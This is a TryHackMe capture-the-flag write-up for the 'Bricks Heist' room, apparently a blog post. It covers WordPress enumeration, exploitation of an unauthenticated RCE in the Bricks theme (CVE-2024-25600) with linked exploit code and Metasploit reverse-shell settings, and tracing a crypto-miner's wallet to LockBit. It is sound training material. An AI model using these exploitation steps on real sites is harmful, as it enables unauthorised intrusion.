mirror of
https://github.com/cotes2020/chirpy-starter.git
synced 2025-04-21 11:53:27 +10:00
119 lines
3.5 KiB
Markdown
119 lines
3.5 KiB
Markdown
---
|
|
title: 'TryHackMe: TryHack3M: Bricks Heist'
|
|
author: AmcaQt
|
|
categories: [TryHackMe]
|
|
tags: [web, enumeration, rce]
|
|
render_with_liquid: false
|
|
media_subpath: /images/thm_bricks_heist/
|
|
image:
|
|
path: room_card.png
|
|
---
|
|
|
|
{: width="600" height="150" .shadow }
|
|
_<https://tryhackme.com/r/room/tryhack3mbricksheist>_
|
|
|
|
## Description
|
|
|
|
Brick Press Media Co. was working on creating a brand-new web theme that represents a renowned wall using three million byte bricks. Agent Murphy comes with a streak of bad luck. And here we go again: the server is compromised, and they've lost access.
|
|
|
|
Can you hack back the server and identify what happened there?
|
|
|
|
Note : Add `MACHINE_IP bricks.thm` to your /etc/hosts file.
|
|
|
|
## Question & Flag
|
|
|
|
### What is the content of the hidden .txt file in the web folder?
|
|
|
|
First, before do further enumaration, let's run the basic scan with nmap
|
|
|
|

|
|
|
|
Interesting find here, without wasting any time let's look further with [**WpScan**](https://www.kali.org/tools/wpscan/)
|
|
|
|

|
|
|
|
The scan shows the site using Theme `bricks` with version `1.9.5`, after some research and finding we found the version is Vuln to Unauthenticated RCE
|
|
|
|

|
|
|
|
The exploit and cve for the version is on github but i want to use metasploit to speed up the exploit
|
|
> https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT
|
|
|
|
Power up your msfconsole and search for bricks, you shall find the matching modules
|
|
|
|

|
|
|
|
simply use command use 0 and fill in the require and you shall get the shell
|
|
|
|

|
|
|
|
```Command
|
|
set LHOST 10.8.58.21
|
|
set RHOSTS https://bricks.thm
|
|
set RPORT 443
|
|
run
|
|
```
|
|
|
|
with that you may find the answer for Task 1
|
|
|
|

|
|
|
|
### What is the name of the suspicious process? & What is the service name affiliated with the suspicious process?
|
|
|
|
For this one go to google and do some research about it , then you'll found the command
|
|
|
|

|
|
|
|
get back to the terminal and try out the command
|
|
|
|

|
|
|
|
but this is not the answer, let's try view the content of the service
|
|
|
|

|
|
|
|
That's what we want
|
|
|
|
### What is the log file name of the miner instance?
|
|
|
|
Notice that the service is executing from `/lib/NetworkManager/` directory, go to that directory
|
|
|
|

|
|
|
|
### What is the wallet address of the miner instance? & The wallet address used has been involved in transactions between wallets belonging to which threat group?
|
|
|
|
Using the strings on the log file that we view earlier, try to decode with [**CyberChef**](https://gchq.github.io/CyberChef/)
|
|
|
|

|
|
|
|
kinda lost on what that is, but since we searched about wallet address so i did some research
|
|
|
|

|
|
|
|
so i need to confirm it, go to [**Blockchair**](https://blockchair.com/) , lucky it was the correct one, so i went down to the last payment received
|
|
|
|

|
|
|
|
Inside that transaction history and from there, inside the privacy check
|
|
|
|

|
|
|
|
We can see the details on the transaction
|
|
|
|

|
|
|
|
Copy the sender address and search it on google, most of the result return `LockBit`
|
|
|
|
> Source :
|
|
>
|
|
> https://ofac.treasury.gov/recent-actions/20240220
|
|
>
|
|
> https://www.chainalysis.com/blog/lockbit-takedown-sanctions-february-2024/
|
|
|
|
## Conclusion
|
|
|
|
This was fun Room and good for beginner to learn about `CVE` and how risky Outdated version of CMS such as `WordPress`.
|
|
|
|
# Happy Hacking
|
|
|
|
 |